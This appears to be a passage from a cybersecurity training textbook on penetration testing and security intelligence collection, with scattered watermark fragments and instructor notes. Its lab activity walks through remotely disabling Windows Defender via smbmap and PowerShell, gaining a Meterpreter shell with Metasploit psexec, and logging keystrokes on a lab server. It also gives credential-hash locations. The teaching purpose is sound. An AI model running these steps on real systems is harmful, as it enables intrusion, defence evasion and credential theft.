External vs. Internal Pen When you decide to perform penetration testing, you'll need to determine who will perform the
Testing actual testing: someone in your organization or an external consultant.
There may be benefits to hiring an external consultant. Consultants who perform penetration testing
on a daily basis for a wide variety of customers are likely to have developed more extensive skills
than someone who does penetration testing for only one company, probably on top of many other

security and IT tasks within their job description. Pen testers with the greatest variety and volume of
experience are likely the most skilled and are likely to offer deep insights into your security
problems. Furthermore, an external pen tester may be more objective than an internal one. They will
be less likely to have social connections within your organization or be influenced by your
organization's office politics. A pen tester with grievances might focus an attack on a particular
person's area of responsibility or might dismiss issues in a system managed by a friend.
On the other hand, there are also benefits to using only internal staff for your penetration testing. If
you already have someone on staff who has pen testing skills, it may be less expensive to have them
perform your pen testing than to hire an external consultant. Furthermore, if you use an external
e
pen tester, you are authorizing an external party to perform otherwise illegal attacks on your
ut
network. In the case of white box or grey box testing, you may be handing sensitive information
over to them before they even start testing. If you don't trust your pen tester, think carefully before
providing such critical access.
ib
In some cases, you may not have a choice; you may be required to take on an external pen tester as
required by regulations.
tr
Pen Testing Technique Categories
is
Some professionals organize pen testing techniques by category. These categories are: Pen Testing Technique
Categories
D
• Physical: As mentioned previously, this category of techniques targets hardware and other
physical assets, and occasionally includes social engineering.
• Technical: These techniques target computing processes. A technical vulnerability is one that a
database. or
computer can identify and mitigate against, such as an SQL injection dumping the contents of a
• Logical: These techniques also target computing processes, but logical vulnerabilities can only
be truly analyzed by humans. A computer is not necessarily equipped to assess the context of a
e
given situation. It may take a person to determine when a network log shows malicious activity
at
versus when it doesn't, based on their own judgment.

• Operational: These techniques target business processes.
lic
Note: Social engineering can span multiple categories. Whereas an attack like tailgating is
physical in nature, an attack like phishing can be considered operational in nature since it can
trick key personnel who have an impact on day-to-day business operations into causing harm to
up
those operations.
Consider asking
Pen Testing Techniques students if they have any
D
techniques to add,
The following are some of the most common and successful pen testing techniques you may choose based on their
to employ: experience or research.
• Exploitation of system and network vulnerabilities
ot
The primary technique employed by pen testers is to take advantage of a vulnerability in the
organization's systems. For example, you can execute code on a host that escalates user privileges
N
due to some flaw in the operating system. Or, you can execute unauthorized queries on a web
server that fails to properly validate input. There are many more such examples of system
exploitation.
o
• War driving
D
You can drive around your office building or other private facilities owned by the organization to
identify any broadcasting Wi-Fi signals. If any signals leak off premises and into a public space
like the roads outside, you can identify the wireless access points (WAPs) used by the
organization. This is helpful in the scanning phase.
• Eavesdropping
Eavesdropping can be done using software that is installed on a computer to track user actions,
or it can be done using a traditional audio recorder planted in a secret place. You should clearly

understand your test's scope and consider the ethics involved in eavesdropping on
communications before implementing this technique, as well as its legality based on your
jurisdiction.
• Network sniffing
Sniffing a network for its packets is useful in intercepting unencrypted data, which can reveal
vulnerabilities in the organization's network infrastructure.
• Physical security testing
All of the virtual security controls in the world won't do your organization much good if
e
someone can simply walk in and steal a laptop without being caught. It's important that you test
the efficacy of physical security protocols like access controls at doors, surveillance cameras, and
ut
placement of devices. Depending on the nature of these tests, you should consider informing law
enforcement before you run them; otherwise, the police won't know that "breaking in" to your
office building is actually part of an authorized test, and not a real crime.
ib
• Social engineering
Tactics such as dumpster diving and impersonation will likely reveal the human-centric
tr
vulnerabilities in your organization. Assessing the ease with which an attacker can trick
employees into breaking security protocols is important to your overall test. Like with
is
eavesdropping, deceiving people has ethical implications that you should be mindful of. You
don't want to undermine your employees' trust in you or their trust in coworkers.
D
Pen Testing Tools of the Trade
Pen Testing Tools of the
Trade or
A penetration tester's toolkit consists of a wide variety of tools, some of which are used in many
other security contexts. Pen testers look for tools that fulfill the different phases of pen testing,
especially those that provide reconnaissance/scanning and exploitation functionalities. Tools that
can maintain access and have good reporting capabilities are a plus, but not as essential.
e
The following table lists some of the more popular tools used by pen testers.
at
Tool Description
lic
Nmap This open source network scanning tool is one of the most popular, and
often comes with its GUI version, Zenmap. Nmap can help a pen tester
by scanning the status of network ports, enumerating host information
up
like its operating system, and identifying the IP addresses of all active
hosts on a network.
Nessus This vulnerability scanning tool can also assist a pen tester in identifying
D
the weaknesses in their targets. It also has port scanning and operating
system enumeration capabilities.
hping This open source spoofing tool provides a pen tester with the ability to
ot
craft network packets to exploit vulnerable firewalls and intrusion

detection systems (IDSs).
N
John the Ripper This open source password cracking utility is one of the most popular,
and often comes with its GUI version, Johnny. John the Ripper can use a
number of cracking techniques like dictionary based, brute force, and
o
hybrid, against a wide variety of hashing algorithms like Message Digest 5

(MD5) and Secure Hash Algorithm (SHA).
D
Cain & Abel This freeware password cracking utility also has the ability to use a
number of hashing algorithms to crack passwords in a variety of ways. It
also comes with many other hacking capabilities, including Address
Resolution Protocol (ARP) spoofing, network sniffing, recording Voice
over IP (VoIP) communications, and more.

Tool Description
Metasploit Framework An open source exploitation framework with a large library of exploits
available. Metasploit is meant to be modular, which helps penetration
testers adapt and write their own exploits and combine them with their
payload of choice. Metasploit can also integrate with a number of
scanning tools like Nmap, Nessus, and Nexpose.
Core Impact™ A proprietary exploitation framework developed by Core Security® that
provides an advanced platform for penetration testing. Along with
e
reconnaissance, scanning, and exploitation, Core Impact also comes with
ut
a robust reporting feature. However, at tens of thousands of dollars, Core
Impact may be too expensive for some organizations.
CANVAS A proprietary exploitation framework developed by Immunity that offers
ib
exploitation features similar to Core Impact. However, CANVAS does
not provide the same level of support for reconnaissance and scanning.
tr
CANVAS is less expensive, but will still run your organization several
thousands of dollars in licensing.
is
Kali Linux
D
Another essential pen testing tool is Kali Linux. Kali Linux™ is a free suite of open source tools Kali Linux
built into a custom Linux® distribution, maintained by the Offensive Security group. It is the
or
successor to BackTrack, a defunct Linux distribution maintained by Offensive Security, and like
BackTrack, Kali Linux has become somewhat of a de facto platform for many security
professionals.
Kali Linux is an operating system built specifically to be used by penetration testers, computer
e
forensic experts, and security auditors. It comes prepackaged with more than 300 different security
at
tools, almost all of which are open source, and many of them industry recognized. Such tools
include:
lic
• Nmap, a network scanner.

• Wireshark, a network traffic analysis tool.
• Metasploit Framework, a suite of exploits used to compromise a remote system.
up
• John the Ripper, an offline password cracking utility.

• Aircrack-ng, a wireless packet sniffer.
• Burp Suite, a tool that can be used as an interception proxy for analyzing traffic and modifying
traffic to exploit web apps.
D
• Ettercap, a network protocol analyzer and man-in-the-middle exploitation tool.

• OWASP ZAP, a web app vulnerability testing tool that has interception proxy capabilities
ot
comparable to Burp Suite.

• THC Hydra, an online password cracking utility.
• Maltego, a reconnaissance tool used in open source intelligence gathering.
N
• sqlmap, a tool that can enumerate and exploit flaws in SQL databases.
• Social-Engineer Toolkit, a framework for launching phishing, spoofing, and other social
engineering attacks.
o
D

e
ut
ib
tr
is
D
or
e
Figure 6-7: Tool categories in Kali Linux.
at
Kali Linux is also fully customizable, so you can construct a distribution with or without certain
tools to tailor it to your own needs. Installation images of Kali Linux come in 32-bit and 64-bit
lic
versions, as well as versions targeting the ARM architecture used by Google Chromebooks™,
Raspberry Pi® devices, and others. An Android™-specific distribution called Kali NetHunter
supports multiple devices.
up
Data Mining in the Public Internet

D
Data Mining in the Public Numerous information sources for hackers are available through the web. A simple web search
Internet reveals links to various tools, methodologies, and lists of vulnerabilities. The web is publicly
Consider reminding available and does not discriminate. It is useful to both attackers and security specialists looking to
ot
students about metadata defend their systems against attack.

analysis and the
Fingerprinting
While the web provides a vast and general source of hacking tools and techniques, it can also serve
Organizations with as a source of very specific information that can be used in an attack on a particular organization or
N
Collected Archives its systems. For example, one might be able to connect with an attacker who is selling specific
(FOCA) tool. information and even access to a target.
o
Common tools, such as Google's search engine, can provide extremely detailed information for free
if you know where to find these tools and know how to use them. Various types of Google hacks
D
(really just advanced search queries) take advantage of Google's vast body of information and
advanced search capabilities to focus on very specific technical information that might be useful to a
pen tester. As a simple example, the Google search link: query operator enables you to find sites
that link to another site. For example, link:www.develetech.com produces a list of sites that link
to www.develetech.com. The site: operator limits a Google search to a particular site or domain.
The filetype: operator limits results to a specific file type. Google provides many other operators.
Used in combination, they can make quick work of searching for specific content in specific
locations.

For example, logging and configuration data that should not be exposed may easily be found this
way. A worst-case scenario for an organization (or a best-case from the perspective of an attacker)
might be a report from intrusion detection, vulnerability assessments, or penetration testing that just
happens to be residing in an exposed location.
Consider demonstrating
Google Hacking Database a site like https://
www.shodan.io and how
The Google Hacking Database (GHDB) at https://www.exploit-db.com/google-hacking- it can be used to access
database/ provides a list of techniques that might be useful to attackers or pen testers, including poorly secured online
e
search queries that can reveal such things as: devices.
• Footholds (can help a hacker gain a foothold on a web server).
ut
• Files containing user names.
• Files containing passwords.
ib
• Files containing useful information.
• Error messages that reveal too much information.
tr
• Sensitive directories (directories that should not be shared but are).
• Vulnerable files.
is
• Vulnerable servers.
• Web server detection (web server profiling information).
• Sensitive online shopping information.
D
• Network or vulnerability data.
• Pages containing login portals.
• Online devices, such as printers, cameras, and so forth.
or
• Servers with faulty applications, scripts, and so forth, which have known vulnerabilities.
e
Attack Surface Scanning and Mapping
at
Attack surface scanning and mapping is about looking at the system from an attacker's perspective Attack Surface Scanning
to identify: and Mapping
lic
• Vulnerabilities that enable unauthorized access and activities on a particular system.

• Which system components are most vulnerable.
• Where you need to focus testing and remediation.
up
The fewer the open pathways and the harder they are to open, the safer your systems are. These
pathways may include such things as web URLs and parameters, applications, scripts, functions,
unused or unsecured system services, application programming interfaces (APIs), web forms, plug-
D
ins, cookies, databases, open ports and sockets, and admin IDs and passwords.
Packet Manipulation for Enumeration

ot
Once an attacker gains access to a network, host, or system, they will commonly perform an Packet Manipulation for
enumeration attack to discover the next layer of attack targets. Enumeration means gathering a list Enumeration
N
of resources that are on that network, host, or system. These resources then become potential
subsequent targets further into the pen test. These resources might be such things as:
o
• Running applications and services.

• Network devices and hosts.
D
• Directories and files.

• Storage shares.
• User accounts.
• APIs.
Enumeration typically requires being able to make a request or query of some sort, and then
receiving a response, which is a list of resources. In some cases, defenses may have already been put

into place to prevent such requests. It may be possible to use packet manipulation to issue a request
and receive a response for the purpose of enumeration.
Packet Crafting
Packet Crafting An attacker or pen tester might want to enumerate all of the protections in place at a particular
location, such as rules in place on a firewall or IDS. One way to accomplish this is by methodically
staging a series of mock attacks, designed to see how the system responds to specific intrusions. An
attacker might use a technique called packet crafting to accomplish this. With packet crafting, the
e
attacker creates new packets from scratch (rather than capturing and modifying packets from
ut
existing traffic), which are custom built to trigger a response if a certain rule is in place but otherwise
go undetected.
ib
tr
is
D
or
e
at
lic
Figure 6-8: Testing a firewall's open ports with a crafted packet.

up
Password Attacks
Password Attacks There are several methods you can use to expose passwords in plaintext to test your systems'
D
security. These password attacks can be grouped into two categories: online and offline.
Online password attacks involve attempting to log in to a live system by guessing a user's password.
You can do this manually or with the help of automated tools. Either way, this type of attack can be
ot
very slow and unreliable, especially in systems that restrict the number of login attempts you can
make in a certain time period. You may end up being locked out of an account if you make too
many unsuccessful guesses. Repeated login attempts may also alert security staff to your actions,
N
again making it difficult to execute an attack successfully.

Offline attacks, on the other hand, involve capturing and working with a password hash or a set of
o
hashes. This is more commonly referred to as password cracking. Offline cracking attempts do not
require that the tester interface live with an authentication system; instead, the tester simply hashes
D
password guesses and compares them to the actual password hashes they have stolen. Assuming you
possess these hashes, offline attacks are quicker and more reliable than online attacks. This is
especially true when you incorporate rainbow tables. Using rainbow tables dramatically reduces the
time needed to crack a password. The biggest limitations to any offline password attack are time and
processing power, and even then, they are more powerful than most online attacks.

Note: You can also use pass the hash techniques to crack user credentials during a pen test.
Note: On a Windows system, password hashes are stored in the SAM database within the
Registry at HKEY_LOCAL_MACHINE\SAM, which requires SYSTEM privileges to access.
On a Linux system, the hash files are located in the /etc/shadow file, which requires superuser
privileges to access.
e
Penetration Test Follow-Up
ut
Following a penetration test, you must identify assets that have been flagged as vulnerable, and you Penetration Test Follow-
must identify possible ways to remediate systems. Just as you do following an internal vulnerability Up
ib
assessment, use a risk management approach to methodically identify security and compliance risks
that you can accept or transfer, and others that you need to reduce or avoid. Be sure to involve
others in this process as required, such as those working in compliance and business roles.
tr
Implement corrections for each vulnerability. Once you have implemented your new configuration,
establish new reference baselines for configuration monitoring, update your documentation, and
is
follow up with any reporting required by regulatory compliance and your internal policies.
Note: If you hired a consultant, a remediation proposal may have been included in the report.
D
Guidelines for Conducting Penetration Testing
Follow these guidelines when conducting penetration testing.
or Guidelines for
Conducting Penetration
e
Conduct Penetration Testing Testing
at
When conducting penetration testing:

• Determine if the pen test will be performed internally or by an external vendor.
lic
• Determine if the test will be conducted in secret or if it will be public knowledge.

• Identify clear boundaries for protecting sensitive information during the test.
• Ensure there is a written ROE document.
up
• Determine if the security department will be involved in the test.

• Identify all relevant stakeholders in the test.
• Consider including any wireless local area networks (WLANs) in the test.
D
• Assess the security of the physical premises.

• Test any security awareness program that's in effect, including through social engineering, if
allowed.
ot
• Identify weaknesses surrounding employees accessing the network through a virtual private
network (VPN).
• Follow up on the results of a pen test by sharing actionable findings with the organization.
N
o
D

ACTIVITY 6-4
Conducting Penetration Testing on Network
Assets
e
Before You Begin
ut
You'll be using your Kali Linux VM in this activity to attack your Windows Server 2019 computer.
ib
Penetration Testing on Scenario
Network Assets
You've identified the vulnerabilities in your organization with the help of Greenbone Vulnerability
Management (GVM). Now it's time to exploit those vulnerabilities. You'll begin a penetration test
tr
on your network using Kali Linux. You decide to familiarize yourself with Metasploit, a well-known
tool included in Kali Linux. You'll be using Metasploit to open a remote shell onto a target server,
is
where you can execute privileged commands on the server. You also want to test out Armitage, a
GUI tool that can help you visualize the exploit more easily.
D
1. Turn off Windows Security on the server remotely.
Ensure students are

entering this command
b) At the terminal, enter:
or
a) From the Kali Linux desktop, open a terminal.
smbmap -d DEVELETECH -u Administrator -p Pa22w0rd -H 10.39.5.# -x

e
on a single line.
'powershell.exe /c Set-MpPreference
at
-DisableRealtimeMonitoring $true'
Make sure to replace # with the last octet of your server's IP address.
The prompt should return if there were no errors in execution.
lic
You remotely executed a Windows PowerShell command that turns off the Windows Security
service. This is necessary because Windows Security identifies the payload you're about to use as
malicious and prevents it from working properly.
up
2. Run the Metasploit Framework and identify search options.

a) At the terminal, enter sudo msfdb init
D
ot
N
o
D

b) Enter msfconsole
Note: It may take a few moments for the console to initialize.
Your prompt should change to msf6 >.
e
ut
ib
tr
is
D
c) At the msf6 > prompt, enter search -h to display the search command options.
or
Note: This command is very useful if you know what you are looking for, but it
often returns too many results for browsing exploits.
You can use the –h flag with most Metasploit commands to see options for that command.
e
d) Enter search CVE-2021-26855
This searches the Common Vulnerabilities and Exposures (CVE) database for a particular
at
vulnerability in the Microsoft Exchange Server that enables remote code execution.
lic
up
D
ot
N
o
D
Note: This is just an example of a vulnerability. In this activity, you'll be

exploiting a PsExec vulnerability in Windows.
3. Do an initial scan to find hosts.

a) Enter hosts
There are no hosts listed.

b) Enter db_nmap –A 10.39.5.0/24 to use Nmap from within Metasploit to discover and
enumerate hosts.
Note: The scan will take a few minutes to run.
The –A flag combines host discovery, operating system detection, version detection, and traceroute.
c) When the scan finishes, observe the results of what Nmap was able to discover about each host.
e
ut
ib
tr
is
D
or
e
at
lic
Note: Nmap results are not always accurate. They may identify an incorrect
operating system running on a host, for example.
up
d) Enter hosts
Nmap has populated the hosts with the results of the Nmap scan, including information about each
one.
D
4. Use a Metasploit exploit to take control of your server.

ot
Explain that students a) Enter use exploit/windows/smb/psexec

can use this method to Your command prompt changes to msf6 exploit(windows/smb/psexec) >.
take control of the server b) Enter info to see information about this attack.
N
because they cracked

c) Enter show options and note the available options.
the administrator
This attack needs an RHOST (a target). An SMBPass and an SMBUser will also be needed if the
password earlier.
host does not allow guest access.
o
d) Enter set RHOST 10.39.5.#, where # is the last number in your Windows Server's IP address.
e) Enter set SMBPass Pa22w0rd
D
f) Enter set SMBUser Administrator

g) Enter show options again to check that your options are shown.

h) Enter exploit to run the attack with those options.

If you have access, it will upload Meterpreter to the system and your command prompt will change
again to meterpreter >.
e
ut
ib
tr
is
Note: If no session was created, run the same command again. If this doesn't
work after a few tries, restart Metasploit, configure the same exploit as before,
D
and try executing it again.
5. Run some rudimentary commands on the server.

a) Enter help to view the options for this powerful tool.
b) Enter cd '\' to go to the root directory on your server.
or
e
Note: The quotes are required.
at
c) Enter ls to view the directory listing for your server.

d) Enter exit to leave Meterpreter.
lic
e) Enter back to return to the main Metasploit prompt.

f) Enter exit to return to the root command prompt.
up
6. Investigate more vulnerabilities using a Metasploit GUI included with Kali

Linux.
a) At the terminal, enter armitage
D
Armitage is a tool that integrates with Metasploit.

b) In the Connect dialog box, accept the defaults (Host: 127.0.0.1, Port: 55553, User: msf) and select
Connect.
ot
N
o
D

c) A warning that the Metasploit RPC server is not started appears. Select Yes to start it.
Note: This may take a few minutes.
When the graphic interface appears, the hosts in the top-right window are already populated
because of your earlier Nmap scan. The bottom window is a command line just like you used in the
last section. A list of exploits is listed on the left.
e
ut
ib
tr
is
D
or
e
d) Right-click the icon of your Windows Server 2019 (10.39.5.#) computer and select Scan.
Notice that in the bottom window, you are running a series of scans from the auxiliary section. You
at
could have run each of these on your own in the command line if you wanted.
e) Wait for the scans to complete, and then right-click your Windows Server icon again and select
Login→psexec.
lic
f) Select the administrator account that appears.

The user name and password appear because of your earlier exploit at the command line.
g) Check the Use reverse connection check box.
up
h) Select Launch.
The same attack you ran at the command line runs here. Notice that your server icon changes to
show it has been exploited.
i) Right-click your server icon and note the new Meterpreter menu with options for some of the
D
capabilities you now have on the server.

ot
N
If time permits, have

o
students try additional

exploits.
D
The keylogger works

even without an open
application, but you can
also have students open
Notepad and type some j) Select Meterpreter 1→Explore→Log Keystrokes.
words or open a browser k) In the Log Keystrokes window, select Launch.
and type in a search l) Switch to your Windows Server 2019 computer and log in as the administrator, if necessary.
term.

m) In Windows Server 2019, press some keys, and note that they appear in the Meterpreter terminal.
7. How would you defend against this attack?
e
A: Answers will vary, but might include: use an intrusion detection system (IDS)/intrusion prevention
ut
system (IPS), use two-factor authentication for administrator accounts, limit the number of
administrator accounts, and ensure strong passwords.
ib
8. What other tools would work well with the Metasploit Framework in a
penetration testing environment?
tr
A: Answers might include vulnerability scanners such as Nessus, Rapid7, and so on; password
crackers like John the Ripper, Cain & Abel, Ncrack, and L0phtCrack; and Nmap and other port
is
scanners.
9. Close Armitage.
D
10.Re-enable Windows Security on the server.
b) Change $true to $false and run the command.

c) Verify that the prompt returns without errors.
or
a) At the terminal, press the Up Arrow until you return to the smbmap command.
e
at
lic
up
D
ot
N
o
D

Summary
In this lesson, you used various techniques to assess the organization's security posture, including
auditing, vulnerability management, and penetration testing. An effective assessment program
combines all of these techniques to identify ways in which the organization can improve its security.
use the social What vulnerability assessment tools do you currently use or plan to use in your
networking tools organization?
e
provided on the CHOICE A: Answers will vary. Vulnerability scanners are a popular choice, and students may have a preference
ut
Course screen to follow for which specific tool they use, if they're given a choice. Other tools like protocol and packet
analyzers are useful for assessing network-based behavior for vulnerabilities. For students who
regularly assess software-based vulnerabilities, a fuzzer is likely part of their toolset.
ib
continued learning.
Which pen testing techniques have you used and found to be effective?
A: Answers will vary, but will include any technique that enables you to discover unknown vulnerabilities
tr
or exploit a vulnerability. For example, war driving is helpful in the scanning phase, and network
sniffing is useful in intercepting unencrypted data. Assessing the ease with which an attacker can trick
is
employees into breaking a security protocol is important, but you must be careful about violating
employees' trust during the pen test. Eavesdropping, dumpster diving, and impersonation can reveal
D
human-centric vulnerabilities, but can also push ethical boundaries if your intentions are not well-
communicated ahead of time.
or
e
at
lic
up
D
ot
N
o
D
Lesson 6: Assessing the Organization's Security Posture |

7 Collecting Cybersecurity
Intelligence
e
ut
ib
tr
is
Lesson Introduction
D
Even with the most thorough testing of a security infrastructure, at some point there will be
problems. You may be able to stop them as they occur and before they cause any damage,
or
or you may have to deal with investigation of an incident that you were unable to stop.
Having good security intelligence at all times will help you keep your systems secure or
make them secure again.
e
Lesson Objectives
at

lic
• Design and implement a system of cybersecurity intelligence collection and analysis.

• Collect data from network-based security intelligence sources.
up
• Collect data from host-based security intelligence sources.

D
ot
N
o
D

TOPIC A
Deploy a Security Intelligence Collection and
Analysis Platform
The key to maintaining secure systems is obtaining information through a security intelligence
e
collection and analysis platform.
ut
Security Intelligence
ib
Security Intelligence The concept of security intelligence existed long before cybersecurity was a concern. Security
intelligence is the process through which data generated in the ongoing use of information systems
is collected, processed, integrated, evaluated, analyzed, and interpreted to provide insights into the
tr
evolving security status of those systems. Threat intelligence is also a part of security intelligence.
A comprehensive and effective security intelligence process can produce a variety of benefits for the
is
organization, such as:
• Faster detection and remediation of threats.
D
• Improved regulatory compliance.
• Reduction of fraud, theft, and data leakage.
or
• Reduction of effort needed to provide security and deal with fallout related to breaches.
• The ability to detect potential weaknesses before an exploit actually occurs.
e
The Challenge of Security Intelligence Collection
at
The Challenge of The primary goals of security intelligence collection are to gather data about everything happening in
Security Intelligence the system and identify security problems revealed by that data. While these goals are simple to state,
Collection implementing a solution is typically anything but simple.
lic
Challenge Description
up
Identifying what data is The first challenges of security intelligence collection are identifying and
relevant obtaining all data that should be analyzed. This information comes from a
wide variety of sources. In fact, any information source that reveals how
and by whom the system is being accessed may potentially provide
D
security intelligence. For example, system logs track the login activities of
users, access to network resources, traffic across network ports, and so
forth. All such information might be useful in providing security
ot
intelligence.
Processing data to The sheer volume of data may itself be challenging, and the data may
N
make it useful originate in a variety of different formats that may be hard to consolidate
and make uniform to enable easy analysis. Moving all data to a single
storage location for processing and analysis can also be challenging.
o
Producing actionable Once the data has been captured and normalized, significant effort may
D
intelligence be required to analyze it and identify anomalies that may point to a

potential problem. A comprehensive dataset is more likely to capture data
that identifies problems, but with more data comes a larger task to
normalize, filter, and organize the data into a useful form.
Lesson 7: Collecting Cybersecurity Intelligence | Topic A

Challenge Description
Time and effort needed Security intelligence tasks can be automated through individual tools or
to set up, configure, comprehensive solutions, such as security information and event
and maintain security management (SIEM), but some solutions may involve extensive scripting
tools or manual processing.
Keeping security data Many of the logs used in security intelligence collection contain
secure information that is useful not only to those protecting the organization's
e
information systems, but would also be useful to an attacker. By putting
systems and processes to collect security intelligence in place, you may
ut
actually create more potential problems.
Some exploits may be purposely designed to erase or modify logs to
cover their tracks. Organizations need to protect logs and monitoring
ib
systems from unauthorized access, alteration, or destruction, especially as
you add to the volume of information your systems collect.
tr
Security Intelligence Collection Lifecycle
is
Security intelligence collection is really about more than just collection, although collection is a big Security Intelligence
D
part of the process. Information regarding potential security problems is hidden within massive Collection Lifecycle
amounts of raw data produced as a byproduct through the ongoing use of your information systems.
The security intelligence collection lifecycle involves various steps you perform to not only collect
or
data, but also to process and analyze it so you can focus on the right data, which is formatted and
organized to provide you with security intelligence.
e
at
lic
up
D
ot
N
Figure 7-1: Security intelligence collection lifecycle.

o
Several steps are involved in this process:

D
1. Planning and direction

Determine what data should be collected, monitored, and analyzed.
2. Collection
Obtain raw data from a variety of sources, such as directory audits, system logs, and network
audits.
3. Processing

Normalize and format data in preparation for analysis.

4. Analysis and production
Identify relevant data and produce a report that identifies action items.
5. Dissemination and integration
Provide a report to those who have requested it or who can take action to resolve problems.
Much of this process can be automated to provide faster notifications of problems and faster
resolution times. Commercial products and open source tools are available to help with specific
aspects of this process, and many of the tools and data sources you will need are likely already in
e
place. Security practitioners typically develop their own processes, toolkits, and preferences for
ut
performing security intelligence collection, but having a standard procedure and approach with
standard tools can help to ensure you aren't skipping important steps or missing critical information.
ib
Security Intelligence Collection Plan
tr
Security Intelligence The first step in planning for security intelligence collection is to determine what sort of intelligence
Collection Plan you want to obtain. Then identify hardware and software sources for collecting and monitoring
appropriate data, and verify that these sources will indeed provide you with all the information you
is
need.
There is a wide variety of potential data sources, some of which you may already capture, such as
D
certain operating system information and application logs. In other cases, you may need to enable
additional logging or tracking capabilities in advance to ensure you have the data you need. Some
sources are not based on logs but require alternative methods of investigation, such as network
or
topology and architecture information. You also need to consider the tools you're using to obtain
this information, as some tools may be more suited to certain parts of the network; for example, a
Server Message Block (SMB) mapping tool would be most effective in areas where network file
e
sharing is common or likely to take place.
Because the collection of some data—which may be critical for producing good intelligence—
at
requires advance planning and preparation, it is important to perform the planning step carefully and
think through your intelligence requirements in advance. In a large organization, this should be
lic
conducted as a unified effort across departments and functional groups to ensure the right data is
being collected.
up
Continuous Security Monitoring (CSM)

Continuous Security The most prominent process that supports intelligence collection is continuous security
Monitoring (CSM) monitoring (CSM). Rather than collection being an ad hoc process, CSM is an ongoing effort to
D
obtain information vital in managing risk within the organization. CSM ensures all key assets and
risk areas are under constant surveillance by finely tuned systems that can detect a wide variety of
issues. Whether it's network traffic, internal and external communications, host maintenance, or
ot
business operations, a CSM architecture carefully tracks the many components that make up the
organization. Essentially, continuous monitoring can turn a reactive collection process into a
N
proactive one, enabling the organization to obtain security intelligence that is comprehensive,
accurate, up to date, and actionable.
Although the effective implementation and maintenance of a CSM capability is complex and time
o
consuming, the result is that systems are continually monitored for problems or potential problems,
and a response can often be crafted as soon as a problem is detected, minimizing or preventing
D
damage.
The United States and other governments are not only requiring that government and military
agencies adopt a program of CSM, but they are also encouraging civilian agencies to do the same.
The U.S. Department of Homeland Security created a program named Continuous Diagnostics
and Mitigation (CDM), which provides U.S. government agencies and departments with
capabilities and tools to "identify cybersecurity risks on an ongoing basis, prioritize these risks based

upon potential impacts, and enable cybersecurity personnel to mitigate the most significant
problems first."
What to Monitor
Security monitoring systems, including those that implement CSM, monitor a variety of items. What to Monitor
Item to Monitor Description and Rationale for Monitoring
e
Vulnerabilities, A system may be vulnerable due to its configuration settings, buggy
configurations, and versions of software or device drivers, missing patches or updates,
ut
assets incorrect policy settings, inappropriate access controls, and so forth. By
collecting state information from your various systems and comparing it
ib
to acceptable baselines, you can determine if the systems are in a
vulnerable state.
Unfortunately, changes to configuration can happen at any time, and
tr
these changes may mean your systems are no longer secure. A user can
change settings or share files or directories on a computer. An
is
administrator can inadvertently make the wrong change to a setting or
policy. A required patch or update may not be installed on a particular
D
system, or it may be inadvertently removed through a rollback, hardware
replacement, or some other configuration change. Because such changes
can happen at any time, you should implement continuous monitoring of
System and network

or
critical storage locations and system configurations to reveal a potential
weakness or vulnerability as soon as it occurs.
Traditional security monitoring often focused on system and network
e
logs logs, which still provide a large volume of useful security data.
An effective system should be able to collect, consolidate, and normalize
at
data from a variety of different logs and data sources, and transmit this
information to a secure database where it can be analyzed. Various events
lic
should trigger the collection of state data, such as system reboots, file
modifications, or the creation of new user accounts. Network logs should
provide data on an ongoing basis.
up
Some individual points of data may be insignificant by themselves, but

may indicate a problem when combined with other data or when viewed
as a trend. So the monitoring system should continually aggregate and
correlate data and analyze it all in the larger context.
D
Security device logs Intrusion detection systems (IDSs) are devices or software applications
that monitor networks and applications to detect suspicious traffic
ot
patterns, activities, or policy violations that might indicate an attack. IDSs

may be considered an early form of CSM, and can be incorporated into
more comprehensive systems.
N
Threat intelligence Threat intelligence sources help to focus security monitoring by providing
information on new threats and current threat trends. Sources of this
o
information include free online registries and catalogs, commercial

registries and monitoring services, and product vendors. Increasingly,
D
these sources are providing threat intelligence data in standard formats

that are easily processed by automated monitoring systems.
Security Monitoring Tools

There are several general tool types that can assist you in your security monitoring efforts, including: Security Monitoring
Tools

• SIEM, which detects alerts provided by devices and applications in real time or near real time.
• Security Content Automation Protocol (SCAP), a conglomeration of open standards that identify
flaws in security configurations.
• Network behavior anomaly detection (NBAD), which monitors network packets for
anomalous behavior based on known signatures.
Before selecting a tool type, you should make sure it fits the following criteria:
• It should collect information from numerous sources.
• It should be able to interoperate with other systems, such as a help desk or change
e
management program.
• It should comply with all relevant laws and industry regulations.
ut
• It should offer scalable reporting so you get both a high-level and low-level perspective on your
security.
ib
NetFlow
NetFlow is a protocol included in many enterprise-level routers and switches that enables network
tr
administrators to monitor the flow of information across a network. NetFlow has gone through
several updates since it was created by Cisco in the early 1990s, but the most recent versions provide
is
the following useful information about packets that traverse NetFlow-enabled devices:
• The networking protocol interface used.
D
• The version and type of IP used.
• The source and destination IP addresses.
(TCP) port.
• The IP's type of service (ToS) used.
or
• The source and destination User Datagram Protocol (UDP)/Transmission Control Protocol
You can use a variety of NetFlow monitoring tools to capture data for point-in-time analysis and to
e
diagnose any security or operational issues the network is experiencing. You can also integrate
at
NetFlow into tools like a SIEM to improve your monitoring capabilities.

lic
Data Collection
Data Collection In general, the more data you collect, the more likely you will have the data you need. But you can't
monitor everything. Some data might not be helpful, and may, in fact, just add to your effort
up
without creating much value. Once you have the data, you must process it into a form that will
quickly reveal the information you need. You must strike a balance with security intelligence
collection between having enough information to get the job done and having so much information
D
that you make the task more difficult and expensive than it needs to be. Many sources for security
intelligence are available, such as those in the following figure.
ot
N
o
D

e
ut
ib
tr
is
D
Figure 7-2: Potential sources of security intelligence.
or
Ensure all the data you collect—including original logs and any files, databases, or systems in which
you aggregate that data—is protected by multiple layers of security. Also, make sure you do not
violate any privacy and compliance requirements by copying or storing restricted information.
e
at
Information Processing
Security data comes from a wide variety of sources. In its raw form, some of that data may not be Information Processing
lic
particularly useful for analysis. To produce actionable intelligence, patterns or anomalies must be
identified within the data that point toward a particular problem or vulnerability. The analysis
process may involve scanning by human eyes, pattern recognition by automation tools, or some
up
combination of both. Whether data is being scanned by humans or software, the data may need to
be reformatted or restructured to facilitate the scanning and analysis process.
There are many different formats for logs, such as proprietary binary formats, tab-separated or
D
comma-separated values (CSV), databases, syslog, Simple Network Management Protocol (SNMP),
and XML. Some formats may be directly readable through a simple text editor, while others are not.
There may be simple encoding differences, such as whether Linux®-style or Windows®-style end-of-
ot
line characters are used, or whether text is ANSI or Unicode. Another processing challenge is the
timestamps used in each log. Hosts might use incorrect internal clock settings, or settings that are
correct for a different time zone. These can vary widely from one log to another, making it difficult
N
to reconstruct time sequences.

o
Log Enrichment
D
Log enrichment attempts to address some of the challenges of processing information by Log Enrichment
